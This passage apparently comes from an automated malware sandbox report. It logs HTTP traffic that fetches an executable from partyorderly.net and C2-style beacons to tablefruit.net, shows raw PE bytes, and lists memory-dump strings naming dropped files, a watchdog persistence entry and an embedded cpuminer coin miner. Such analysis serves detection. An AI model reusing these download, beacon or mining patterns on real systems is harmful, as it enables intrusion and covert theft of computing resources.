P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28
.............
GET /dep/win64drkclient.exe HTTP/1.0
Accept: */*
Connection: close
Host: partyorderly.net
HTTP/1.0 200 OK
Date: Tue, 29 Apr 2014 16:59:56 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 21 Feb 2014 20:25:42 GMT
Accept-Ranges: bytes
Content-Length: 2785792
Content-Type: application/octet-stream
Age: 0
Server: YTS/1.20.28
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...K..S.................. ..~*..V............@..............................@ .....M/ ....... .......................................*.......*..$............(...............*.8I.......................... .*.(.....................*.@............................text..... ....... .................`.p`.data...`..... ....... .............@....rdata..h`....!..b....!.............@.`@.pdata........(.......'.............@.0@.xdata..<....0).......).............@.@@.bss.....U...0*.......................`..edata........*.......).............@.0@.idata...$....*..&....*.............@.0..CRT....p.....*......4*.............@.@..tls....h.....*......6*.............@.`..reloc..8I....*..J...8*.............@.0B.................................................................................................................................................................................................ffffff.........H..(1.f.=....MZ...Z*........Z*........Z*........Z*.....tg....*....Z*...tH......uw .H......... ....Z*.H...s*.H...s*.H....*...... ..=(.!..tf1.H..(.......-w ......Hc.....H..B...H...:PE..u...J.f....t?f......j............].........1.......K...f.H.... .... .1.H..(..zt...,.........1............H..8..&Z*.D../Z*.L....*.H....*.H....*.....*.H....*.H.D$ .sv .....*.H..8.........AUATUWVSH......D...Y*.1......H.T$ E..H...H.......eH..%0...1.H.X.H.=i.*..........H9...'..........H...H....r*.H..u....r*.1.....
<<
<<< skipped >>>
GET /forum/search.php?method=hostname&host=VVV.facebook.com&mode=sox&v=027&sox=3c0f8605&lport=1&rsid=3b93be04&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 200 OK
Date: Tue, 29 Apr 2014 16:59:56 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28
..........................
Map
Strings from Dumps
pozlrpaqbu.exe_3076:
.text
.text
`.rdata
`.rdata
@.data
@.data
SSSSSh
SSSSSh
.pHUf
.pHUf
\$HSSSh
\$HSSSh
~3SSSh0
~3SSSh0
SSShPbC
SSShPbC
SSShP
SSShP
toSSShPbC
toSSShPbC
t}SSSh
t}SSSh
u3SSShP
u3SSShP
tBSSSh 'E
tBSSSh 'E
SSSh 'E
SSSh 'E
~<SSSh><pre>vSSSh</pre><pre>FTPjK</pre><pre>FtPj;</pre><pre>C.PjRV</pre><pre>tGHt.Ht&</pre><pre>WS2_32.dll</pre><pre>OLEAUT32.dll</pre><pre>cmd.exe</pre><pre>Please contact the application's support team for more information.</pre><pre>- Attempt to initialize the CRT more than once.</pre><pre>- CRT not initialized</pre><pre>- floating point support not loaded</pre><pre>portuguese-brazilian</pre><pre>operator</pre><pre>GetProcessWindowStation</pre><pre>USER32.DLL</pre><pre>GDI32.dll</pre><pre>GetProcessHeap</pre><pre>KERNEL32.dll</pre><pre>GetKeyboardType</pre><pre>USER32.dll</pre><pre>GetCPInfo</pre><pre>GetConsoleOutputCP</pre><pre>pozlrpaqbu.exe</pre><pre>qsxdn.exe</pre><pre>alccsjb.exe</pre><pre>Ca.Dq ~</pre><pre>.hh#HD</pre><pre>0mw%fV</pre><pre>JW%%Cp3F</pre><pre>e.aQ{</pre><pre>%uKJ}W</pre><pre>;ÅM</pre><pre>-)*%u</pre><pre>"B.gX1</pre><pre>zcÁ</pre><pre>%Documents and Settings%\LocalService</pre><pre>|%System%\alccsjb.exe</pre><pre>|tablefruit.net</pre><pre>WATCHDOGPROC "c:\windows\system32\pozlrpaqbu.exe"</pre><pre>%System%\pozlrpaqbu.exe</pre><pre>mscoree.dll</pre><pre>KERNEL32.DLL</pre><b>alccsjb.exe_3776:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>SSSSSh</pre><pre>.pHUf</pre><pre>\$HSSSh</pre><pre>~3SSSh0</pre><pre>SSShPbC</pre><pre>SSShP</pre><pre>toSSShPbC</pre><pre>t}SSSh</pre><pre>u3SSShP</pre><pre>tBSSSh 'E</pre><pre>SSSh 'E</pre><pre>~<SSSh><pre>vSSSh</pre><pre>FTPjK</pre><pre>FtPj;</pre><pre>C.PjRV</pre><pre>tGHt.Ht&</pre><pre>WS2_32.dll</pre><pre>OLEAUT32.dll</pre><pre>cmd.exe</pre><pre>Please contact the application's support team for more information.</pre><pre>- Attempt to initialize the CRT more than once.</pre><pre>- CRT not initialized</pre><pre>- floating point support not loaded</pre><pre>portuguese-brazilian</pre><pre>operator</pre><pre>GetProcessWindowStation</pre><pre>USER32.DLL</pre><pre>GDI32.dll</pre><pre>GetProcessHeap</pre><pre>KERNEL32.dll</pre><pre>GetKeyboardType</pre><pre>USER32.dll</pre><pre>GetCPInfo</pre><pre>GetConsoleOutputCP</pre><pre>pozlrpaqbu.exe</pre><pre>qsxdn.exe</pre><pre>alccsjb.exe</pre><pre>Ca.Dq ~</pre><pre>.hh#HD</pre><pre>0mw%fV</pre><pre>JW%%Cp3F</pre><pre>e.aQ{</pre><pre>%uKJ}W</pre><pre>;ÅM</pre><pre>@#.df</pre><pre>-)*%u</pre><pre>"B.gX1</pre><pre>zcÁ</pre><pre>%Documents and Settings%\LocalService</pre><pre>%System%\alccsjb.exe</pre><pre>mscoree.dll</pre><pre>KERNEL32.DLL</pre><b>zcwj1w7efm80qsxdn.exe_880:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>SSSSSh</pre><pre>.pHUf</pre><pre>\$HSSSh</pre><pre>~3SSSh0</pre><pre>SSShPbC</pre><pre>SSShP</pre><pre>toSSShPbC</pre><pre>t}SSSh</pre><pre>u3SSShP</pre><pre>tBSSSh 'E</pre><pre>SSSh 'E</pre><pre>~<SSSh><pre>vSSSh</pre><pre>FTPjK</pre><pre>FtPj;</pre><pre>C.PjRV</pre><pre>tGHt.Ht&</pre><pre>WS2_32.dll</pre><pre>OLEAUT32.dll</pre><pre>cmd.exe</pre><pre>Please contact the application's support team for more information.</pre><pre>- Attempt to initialize the CRT more than once.</pre><pre>- CRT not initialized</pre><pre>- floating point support not loaded</pre><pre>portuguese-brazilian</pre><pre>operator</pre><pre>GetProcessWindowStation</pre><pre>USER32.DLL</pre><pre>GDI32.dll</pre><pre>GetProcessHeap</pre><pre>KERNEL32.dll</pre><pre>GetKeyboardType</pre><pre>USER32.dll</pre><pre>GetCPInfo</pre><pre>GetConsoleOutputCP</pre><pre>pozlrpaqbu.exe</pre><pre>qsxdn.exe</pre><pre>alccsjb.exe</pre><pre>Ca.Dq ~</pre><pre>.hh#HD</pre><pre>0mw%fV</pre><pre>JW%%Cp3F</pre><pre>e.aQ{</pre><pre>%uKJ}W</pre><pre>;ÅM</pre><pre>@#.df</pre><pre>-)*%u</pre><pre>"B.gX1</pre><pre>zcÁ</pre><pre>%Documents and Settings%\LocalService</pre><pre>%WinDir%\TEMP\zcwj1w7efm80qsxdn.exe</pre><pre>mscoree.dll</pre><pre>KERNEL32.DLL</pre><b>win32drkclient.exe_2236:</b><pre>.text</pre><pre>``.data</pre><pre>.rdata</pre><pre>`@.bss</pre><pre>.idata</pre><pre>\\\\5\\\\</pre><pre>|$@3\$,3\$0</pre><pre>\$$!|$$!</pre><pre>|$ 1|$41</pre><pre>\$0#\$(1</pre><pre>|$\3|$81</pre><pre>\$\3\$`3</pre><pre>""""%""""1</pre><pre>1|$,1\$,</pre><pre>\$\3\$ 1|$(</pre><pre>\$43\$01</pre><pre>\$ 3\$41</pre><pre>1\$,1|$,</pre><pre>\$ 3\$(3\$8</pre><pre>|$03|$43|$@</pre><pre>|$,3|$83|$ 3|$</pre><pre>libgcj-13.dll</pre><pre>accepted: %lu/%lu (%.2f%%), %s khash/s %s</pre><pre>DEBUG: reject reason: %s</pre><pre>cpuminer 2.3.2</pre><pre>DEBUG: job_id='%s' extranonce2=%s ntime=x</pre><pre>JSON decode of %s failed</pre><pre>http://</pre><pre>https://</pre><pre>stratum tcp://</pre><pre>http://%s</pre><pre>Starting Stratum on %s</pre><pre>...terminating workio thread</pre><pre>...retry after %d seconds</pre><pre>JSON decode failed(%d): %s</pre><pre>{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}</pre><pre>{"method": "getwork", "params": [ "%s" ], "id":1}</pre><pre>Binding thread %d to cpu %d</pre><pre>thread %d: %lu hashes, %s khash/s</pre><pre>Total: %s khash/s</pre><pre>work retrieval failed, exiting mining thread %d</pre><pre>JSON key '%s' not found</pre><pre>JSON key '%s' is not a string</pre><pre>CURL initialization failed</pre><pre>%s%s%s</pre><pre>Long-polling activated for %s</pre><pre>json_rpc_call failed, retry after %d seconds</pre><pre>DEBUG: got new work in %d ms</pre><pre>http://127.0.0.1:9332/</pre><pre>%s: unsupported non-option argument '%s'</pre><pre>JSON option %s invalid</pre><pre>https:</pre><pre>%s:%s</pre><pre>thread %d create failed</pre><pre>%d miner threads started, using '%s' algorithm.</pre><pre>cert</pre><pre>userpass</pre><pre>[%d-d-d d:d:d] %s</pre><pre>User-Agent: cpuminer/2.3.2</pre><pre>HTTP request failed: %s</pre><pre>JSON-RPC call failed: %s</pre><pre>hex2bin failed on '%s'</pre><pre>DEBUG: %s</pre><pre>Hash: %s</pre><pre>Target: %s</pre><pre>http%s</pre><pre>http_proxy</pre><pre>Stratum connection failed: %s</pre><pre>{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}</pre><pre>{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}</pre><pre>mining.notify</pre><pre>Stratum session id: %s</pre><pre>mining.set_difficulty</pre><pre>client.reconnect</pre><pre>stratum tcp://%s:%d</pre><pre>Server requested reconnection to %s</pre><pre>client.get_version</pre><pre>cpuminer/2.3.2</pre><pre>client.show_message</pre><pre>MESSAGE FROM SERVER: %s</pre><pre>{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}</pre><pre>#"! '&%$ *)(/.-,32107654;:98?>=<2</pre><pre>tXXFr.rh.44Aw-wl-66</pre><pre>r.rh.44Fw-wl-66A</pre><pre>.rh.44Fr-wl-66Aw</pre><pre>O9K\9..eKW</pre><pre>trh.44Fr.wl-66Aw-</pre><pre>K\9..eK9</pre><pre>h.44Fr.rl-66Aw-w</pre><pre>O\9..eK9K=W</pre><pre>.44Fr.rh-66Aw-wl</pre><pre>9..eK9K\W</pre><pre>t44Fr.rh.66Aw-wl-</pre><pre>..eK9K\9</pre><pre>tX4Fr.rh.46Aw-wl-6</pre><pre>.eK9K\9.</pre><pre>7.35.0</pre><pre>smtp</pre><pre>tftp</pre><pre>getpeername() failed with errno %d: %s</pre><pre>getsockname() failed with errno %d: %s</pre><pre>ssrem inet_ntop() failed with errno %d: %s</pre><pre>ssloc inet_ntop() failed with errno %d: %s</pre><pre>sa_addr inet_ntop() failed with errno %d: %s</pre><pre>Trying %s...</pre><pre>Could not set TCP_NODELAY: %s</pre><pre>TCP_NODELAY set</pre><pre>Failed to set SO_KEEPALIVE on fd %d</pre><pre>Failed to set SIO_KEEPALIVE_VALS on fd %d: %d</pre><pre>Couldn't bind to interface '%s'</pre><pre>Local Interface %s is ip %s using address family %i</pre><pre>Name '%s' family %i resolved to '%s' family %i</pre><pre>Local port: %hu</pre><pre>Bind to local port %hu failed, trying next</pre><pre>bind failed with errno %d: %s</pre><pre>Immediate connect fail for %s: %s</pre><pre>Couldn't bind to '%s'</pre><pre>connect to %s port %ld failed: %s</pre><pre>Failed to connect to %s port %ld: %s</pre><pre>[%s %s %s]</pre><pre>Send failure: %s</pre><pre>Recv failure: %s</pre><pre>Write callback asked for PAUSE when not supported!</pre><pre>%s:%d</pre><pre>Hostname was %sfound in DNS cache</pre><pre>timeout on name lookup is not supported</pre><pre>%5[^:]:%d:%5s</pre><pre>Resolve %s found illegal!</pre><pre>Added %s:%d:%s to DNS cache</pre><pre>IDN support not present, can't parse Unicode domains</pre><pre>CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!</pre><pre>Connected to %s (%s) port %ld (#%ld)</pre><pre>User-Agent: %s</pre><pre>[^:]:%[^</pre><pre>:]://%[^</pre><pre><url> malformed</url></pre><pre>SMTP.</pre><pre>Rebuilt URL to: %s</pre><pre>Protocol %s not supported or disabled in libcurl</pre><pre>%s://%s</pre><pre>[%*45[0123456789abcdefABCDEF:.]%c</pre><pre>;type=%c</pre><pre>%s://%s%s%s:%hu%s%s%s</pre><pre>Port number too large: %lu</pre><pre>Couldn't find host %s in the _netrc file; using defaults</pre><pre>ftp@example.com</pre><pre>Found bundle for host %s: %p</pre><pre>Server doesn't support pipelining</pre><pre>Found connection %ld, with requests in the pipe (%zu)</pre><pre>Re-using existing connection! (#%ld) with host %s</pre><pre>Couldn't resolve host '%s'</pre><pre>Couldn't resolve proxy '%s'</pre><pre>Connection #%ld to host %s left intact</pre><pre>Curl_poll(%d ds, %d ms)</pre><pre>Internal error clearing splay node = %d</pre><pre>Internal error removing splay node = %d</pre><pre>Pipe broke: handle 0x%p, url = %s</pre><pre>In state %d with no easy_conn, bail out!</pre><pre>Operation timed out after %ld milliseconds with %I64d out of %I64d bytes received</pre><pre>Operation timed out after %ld milliseconds with %I64d bytes received</pre><pre>#HttpOnly_</pre><pre>23[^;</pre><pre>=]=I99[^;</pre><pre>httponly</pre><pre>skipped cookie with bad tailmatch domain: %s</pre><pre>%s cookie %s="%s" for domain %s, path %s, expire %I64d</pre><pre># Netscape HTTP Cookie File</pre><pre># http://curl.haxx.se/docs/http-cookies.html</pre><pre># This file was generated by libcurl! Edit at your own risk.</pre><pre># Fatal libcurl error</pre><pre>WARNING: failed to save cookies in %s</pre><pre>%d.%d.%d.%d</pre><pre>CURLSHcode unknown</pre><pre>Protocol option is unsupported</pre><pre>Protocol is unsupported</pre><pre>Socket is unsupported</pre><pre>Operation not supported</pre><pre>Address family not supported</pre><pre>Protocol family not supported</pre><pre>Winsock version not supported</pre><pre>Unknown error %d (%#x)</pre><pre>Please call curl_multi_perform() soon</pre><pre>Unsupported protocol</pre><pre>URL using bad/illegal format or missing URL</pre><pre>A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.</pre><pre>FTP: weird server reply</pre><pre>FTP: The server failed to connect to data port</pre><pre>FTP: unknown PASS reply</pre><pre>FTP: Accepting server connect has timed out</pre><pre>FTP: unknown PASV reply</pre><pre>FTP: unknown 227 response format</pre><pre>FTP: can't figure out the host in the PASV response</pre><pre>FTP: couldn't set file type</pre><pre>FTP: couldn't retrieve (RETR failed) the specified file</pre><pre>HTTP response code said error</pre><pre>FTP: command PORT failed</pre><pre>FTP: command REST failed</pre><pre>Operation was aborted by an application callback</pre><pre>A libcurl function was given a bad argument</pre><pre>An unknown option was passed in to libcurl</pre><pre>SSL peer certificate or SSH remote key was not OK</pre><pre>Problem with the local SSL certificate</pre><pre>Peer certificate cannot be authenticated with given CA certificates</pre><pre>Unrecognized or bad HTTP Content or Transfer-Encoding</pre><pre>Invalid LDAP URL</pre><pre>Login denied</pre><pre>TFTP: File Not Found</pre><pre>TFTP: Access Violation</pre><pre>TFTP: Illegal operation</pre><pre>TFTP: Unknown transfer ID</pre><pre>TFTP: No such user</pre><pre>Caller must register CURLOPT_CONV_ callback options</pre><pre>Problem with the SSL CA cert (path? access rights?)</pre><pre>Error in the SSH layer</pre><pre>Issuer check against peer certificate failed</pre><pre>FTP: The server did not accept the PRET command.</pre><pre>Unable to parse FTP file list</pre><pre>0123456789</pre><pre>%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s</pre><pre>Curl_ipv4_resolve_r failed for %s</pre><pre>%sAuthorization: Basic %s</pre><pre>HTTP/</pre><pre>Avoided giant realloc for header (max is %d)!</pre><pre>The requested URL returned error: %d</pre><pre>%s auth using %s with user '%s'</pre><pre>%s, d %s M d:d:d GMT</pre><pre>If-Modified-Since: %s</pre><pre>If-Unmodified-Since: %s</pre><pre>Last-Modified: %s</pre><pre>Referer: %s</pre><pre>Accept-Encoding: %s</pre><pre>Host: %s%s%s</pre><pre>Host: %s%s%s:%hu</pre><pre>ftp://</pre><pre>Range: bytes=%s</pre><pre>Content-Range: bytes %s%I64d/%I64d</pre><pre>Content-Range: bytes %s/%I64d</pre><pre>ftp://%s:%s@%s</pre><pre>%s HTTP/%s</pre><pre>%s%s%s%s%s%s%s%s%s%s%s</pre><pre>%s%s=%s</pre><pre>Internal HTTP POST error!</pre><pre>Content-Type: application/x-www-form-urlencoded</pre><pre>Failed sending HTTP POST request</pre><pre>Failed sending HTTP request</pre><pre>Chunky upload is not supported by HTTP 1.0</pre><pre>HTTP error before end of send, stop sending</pre><pre>HTTP/%d.%d =</pre><pre>HTTP =</pre><pre>RTSP/%d.%d =</pre><pre>The requested URL returned error: %s</pre><pre>HTTP 1.0, assume close after body</pre><pre>HTTP/1.0 proxy connection set to keep alive!</pre><pre>HTTP/1.1 proxy connection set close!</pre><pre>HTTP/1.0 connection set to keep alive!</pre><pre>USER %s</pre><pre>PBSZ %d</pre><pre>Failure sending QUIT command: %s</pre><pre>ftp server doesn't support SIZE</pre><pre>RETR %s</pre><pre>Connect data stream passively</pre><pre>APPE %s</pre><pre>STOR %s</pre><pre>SIZE %s</pre><pre>getsockname() failed: %s</pre><pre>failed to resolve the address provided to PORT: %s</pre><pre>bind(port=%hu) on non-local address failed: %s</pre><pre>bind(port=%hu) failed: %s</pre><pre>bind() failed, we ran out of ports!</pre><pre>socket failure: %s</pre><pre>%s |%d|%s|%hu|</pre><pre>Failure sending EPRT command: %s</pre><pre>,%d,%d</pre><pre>%s %s</pre><pre>Failure sending PORT command: %s</pre><pre>Uploading to a URL without a file name!</pre><pre>FTPS not supported!</pre><pre>PASS %s</pre><pre>ACCT %s</pre><pre>Access denied: d</pre><pre>%c%c%c%u%c</pre><pre>Illegal port number in EPSV reply</pre><pre>%d,%d,%d,%d,%d,%d</pre><pre>Skips %d.%d.%d.%d for data connection, uses %s instead</pre><pre>Bad PASV/EPSV response: d</pre><pre>Can't resolve proxy host %s:%hu</pre><pre>Can't resolve new host %s:%hu</pre><pre>Connecting to %s (%s) port %d</pre><pre>TYPE %c</pre><pre>MDTM %s</pre><pre>CWD %s</pre><pre>PRET %s</pre><pre>PRET STOR %s</pre><pre>PRET RETR %s</pre><pre>REST %d</pre><pre>FTP response timeout</pre><pre>FTP response aborted due to select/poll error: %d</pre><pre>Preparing for accepting server on data port</pre><pre>Got a d ftp-server response when 220 was expected</pre><pre>unsupported parameter to CURLOPT_FTPSSLAUTH: %d</pre><pre>AUTH %s</pre><pre>ACCT rejected by server: d</pre><pre>PROT %c</pre><pre>Entry path is '%s'</pre><pre>QUOT command failed with d</pre><pre>MKD %s</pre><pre>Failed to MKD dir: d</pre><pre>dddddd</pre><pre>ddd d:d:d GMT</pre><pre>Last-Modified: %s, d %s M d:d:d GMT</pre><pre>unsupported MDTM reply format</pre><pre>Got a d response code instead of the assumed 200</pre><pre>PRET command not accepted: d</pre><pre>Failed to do PORT</pre><pre>RETR response: d</pre><pre>Failed FTP upload: </pre><pre>Wildcard - START of "%s"</pre><pre>Wildcard - "%s" skipped by user</pre><pre>ftp_perform ends with SECONDARY: %d</pre><pre>Remembering we are in dir "%s"</pre><pre>Failure sending ABOR command: %s</pre><pre>server did not report OK, got %d</pre><pre>QUOT string not accepted: %s</pre><pre>PORT</pre><pre>%s IAC %s</pre><pre>%s IAC %d</pre><pre>%s %s %s</pre><pre>%s %s %d</pre><pre>%s %d %d</pre><pre>Sending data failed (%d)</pre><pre>%s IAC SB</pre><pre>%s (unsupported)</pre><pre>%d (unknown)</pre><pre>%c%c%c%c%s%c%c</pre><pre>%c%c%c%c</pre><pre>7[^,],7s</pre><pre>%c%s%c%s</pre><pre>USER,%s</pre><pre>7[^= ]%*[ =]%5s</pre><pre>Syntax error in telnet option: %s</pre><pre>Unknown telnet option %s</pre><pre>WSAStartup failed (%d)</pre><pre>insufficient winsock version to support telnet</pre><pre>failed to load WS2_32.DLL (%d)</pre><pre>failed to find WSACreateEvent function (%d)</pre><pre>failed to find WSACloseEvent function (%d)</pre><pre>failed to find WSAEventSelect function (%d)</pre><pre>failed to find WSAEnumNetworkEvents function (%d)</pre><pre>WSACreateEvent failed (%d)</pre><pre>WSAEnumNetworkEvents failed (%d)</pre><pre>WSACloseEvent failed (%d)</pre><pre>FreeLibrary(wsock2) failed (%d)</pre><pre>WS2_32.DLL</pre><pre>CLIENT libcurl 7.35.0</pre><pre>MATCH %s %s %s</pre><pre>DEFINE %s %s</pre><pre>LDAP local: LDAP Vendor = %s ; LDAP Version = %d</pre><pre>LDAP local: %s</pre><pre>LDAP local: Cannot connect to %s:%ld</pre><pre>LDAP local: ldap_simple_bind_s %s</pre><pre>LDAP remote: %s</pre><pre>There are more than %d entries</pre><pre>LDAP local: trying to establish %s connection</pre><pre>Couldn't open file %s</pre><pre>Can't open %s for writing</pre><pre>Can't get the size of %s</pre><pre>Received last DATA packet block %d again.</pre><pre>Received unexpected DATA packet block %d, expecting block %d</pre><pre>Timeout waiting for block %d ACK. Retries = %d</pre><pre>tftp_rx: internal error</pre><pre>set timeouts for state %d; Total %ld, retry %d maxtry %d</pre><pre>Received ACK for block %d, expecting %d</pre><pre>tftp_tx: giving up waiting for block %d ack</pre><pre>tftp_tx: internal error, event: %i</pre><pre>bind() failed; %s</pre><pre>%s%c%s%c</pre><pre>tftp_send_first: internal error</pre><pre>TFTP finished</pre><pre>TFTP response timeout</pre><pre>got option=(%s) value=(%s)</pre><pre>blksize is larger than max supported</pre><pre>%s (%d)</pre><pre>blksize is smaller than min supported</pre><pre>%s (%ld)</pre><pre>%s (%d) %s (%d)</pre><pre>invalid tsize -:%s:- value in OACK packet</pre><pre>TFTP</pre><pre>%cd</pre><pre>LIST "%s" *</pre><pre>FETCH %s BODY[%s]</pre><pre>LOGIN</pre><pre>LOGIN %s %s</pre><pre>AUTHENTICATE %s %s</pre><pre>AUTHENTICATE %s</pre><pre>No known authentication mechanisms supported!</pre><pre>IMAPS not supported!</pre><pre>Access denied: %d</pre><pre>APPEND %s (\Seen) {%I64d}</pre><pre>SELECT %s</pre><pre>LOGINDISABLED</pre><pre>STARTTLS not supported.</pre><pre>STARTTLS denied. %c</pre><pre>Access denied. %c</pre><pre>Authentication failed: %d</pre><pre>AUTH %s %s</pre><pre>POP3S not supported!</pre><pre>APOP %s %s</pre><pre>STLS not supported.</pre><pre>RCPT TO:%s</pre><pre>RCPT TO:<%s></pre><pre>SMTPS not supported!</pre><pre>Got unexpected smtp-server response: %d</pre><pre>EHLO %s</pre><pre>HELO %s</pre><pre>Remote access denied: %d</pre><pre>Command failed: %d</pre><pre>MAIL failed: %d</pre><pre>RCPT failed: %d</pre><pre>DATA failed: %d</pre><pre>MAIL FROM:%s</pre><pre>MAIL FROM:%s AUTH=%s</pre><pre>MAIL FROM:%s AUTH=%s SIZE=%s</pre><pre>MAIL FROM:%s SIZE=%s</pre><pre>SMTP</pre><pre>Refusing to issue an RTSP request [%s] without a session ID.</pre><pre>Transport:</pre><pre>Transport: %s</pre><pre>Refusing to issue an RTSP SETUP without a Transport: header.</pre><pre>Range: %s</pre><pre>%s %s RTSP/1.0</pre><pre>Session: %s</pre><pre>%s%s%s%s%s%s</pre><pre>Unable to read the CSeq header: [%s]</pre><pre>Got RTSP Session ID Line [%s], but wanted ID [%s]</pre><pre>Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds</pre><pre>%%X</pre><pre>xxxx</pre><pre>%s:%s:%s</pre><pre>%s:%.*s</pre><pre>%s:%s:x:%s:%s:%s</pre><pre>%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", cnonce="%s", nc=x, qop=%s, response="%s"</pre><pre>%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", response="%s"</pre><pre>%s, opaque="%s"</pre><pre>%s, algorithm="%s"</pre><pre>SOCKS4 communication to %s:%d</pre><pre>SOCKS4 connect to %s (locally resolved)</pre><pre>Failed to resolve "%s" for SOCKS4 connect.</pre><pre>SOCKS4%s request granted.</pre><pre>Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.</pre><pre>Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.</pre><pre>Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.</pre><pre>Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.</pre><pre>User was rejected by the SOCKS5 server (%d %d).</pre><pre>SOCKS5 GSSAPI per-message authentication is not supported.</pre><pre>No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)</pre><pre>Failed to resolve "%s" for SOCKS5 connect.</pre><pre>Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)</pre><pre>Can't complete SOCKS5 connection to %s:%d. (%d)</pre><pre>Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)</pre><pre>Establish HTTP proxy tunnel to %s:%hu</pre><pre>%s:%hu</pre><pre>%s%s%s:%hu</pre><pre>Host: %s</pre><pre>CONNECT %s HTTP/%s</pre><pre>%s%s%s%s</pre><pre>HTTP/1.%d %d</pre><pre>TUNNEL_STATE switched to: %d</pre><pre>Received HTTP code %d from proxy after CONNECT</pre><pre>login</pre><pre>password</pre><pre>operation aborted by callback</pre><pre>Read callback asked for PAUSE when not supported!</pre><pre>seek callback returned error %d</pre><pre>the ioctl callback returned %d</pre><pre>ioctl callback returned error %d</pre><pre>Rewinding stream by : %zd bytes on url %s (zero-length body)</pre><pre>Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)</pre><pre>HTTP server doesn't seem to support byte ranges. Cannot resume.</pre><pre>Simulate a HTTP 304 response!</pre><pre>Problem (%d) in the Chunked-Encoded data</pre><pre>Rewinding stream by : %zu bytes on url %s (size = %I64d, maxdownload = %I64d, bytecount = %I64d, nread = %zd)</pre><pre>Excess found in a non pipelined read: excess = %zu, size = %I64d, maxdownload = %I64d, bytecount = %I64d</pre><pre>No URL set!</pre><pre>[^?&/:]://%c</pre><pre>Issue another request to this URL: '%s'</pre><pre>Violate RFC 2616/10.3.2 and switch from POST to GET</pre><pre>Violate RFC 2616/10.3.3 and switch from POST to GET</pre><pre>Disables POST, goes with %s</pre><pre>Conn: %ld (%p) Receive pipe weight: (%I64d/%zu), penalized: %s</pre><pre>Site %s:%d is pipeline blacklisted</pre><pre>Server %s is not blacklisted</pre><pre>Server %s is blacklisted</pre><pre>d:d:d</pre><pre>d:d</pre><pre>%c%c==</pre><pre>%c%c%c=</pre><pre>------------------------xx</pre><pre>; filename="%s"</pre><pre>%s; boundary=%s</pre><pre>Content-Type: multipart/mixed, boundary=%s</pre><pre>Content-Type: %s</pre><pre>couldn't open file "%s"</pre><pre>--%s--</pre><pre>.jpeg</pre><pre>.html</pre><pre>0123456789-</pre><pre>%s xxxxxxxxxxxxxxxx</pre><pre>%s/%s</pre><pre>username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s</pre><pre>user=%s</pre><pre>auth=Bearer %s</pre><pre>%s near '%s'</pre><pre>%s near end of file</pre><pre>unable to decode byte 0x%x at position %d</pre><pre>control character 0x%x</pre><pre>invalid Unicode '\uX\uX'</pre><pre>invalid Unicode '\uX'</pre><pre>end == saved_text lex->saved_text.length</pre><pre>unable to open %s: %s</pre><pre>\ux</pre><pre>\ux\ux</pre><pre>Assertion failed: (%s), file %s, line %d</pre><pre>M%p %d %s</pre><pre>M%p %d V=%0X B=%d t=%d o=%d C=%d R=%d H=%p %s</pre><pre>once %p is %d</pre><pre>T%p %d %s</pre><pre>T%p %d V=%0X H=%p %s</pre><pre>C%p %d %s</pre><pre>C%p %d V=%0X B=%d b=%p w=%ld %s</pre><pre>RWL%p %d %s</pre><pre>RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s</pre><pre>_matherr(): %s in %s(%g, %g) (retval=%g)</pre><pre>VirtualQuery failed for %d bytes at address %p</pre><pre>VirtualProtect failed with code 0x%x</pre><pre>Unknown pseudo relocation protocol version %d.</pre><pre>Unknown pseudo relocation bit size %d.</pre><pre>unknown option -- %s</pre><pre>unknown option -- %c</pre><pre>option requires an argument -- %s</pre><pre>option requires an argument -- %c</pre><pre>jZGCC: (GNU) 4.8.2 20131016 (Fedora MinGW 4.8.2-1.fc20)</pre><pre>GCC: (GNU) 4.8.2 20131016 (Fedora MinGW 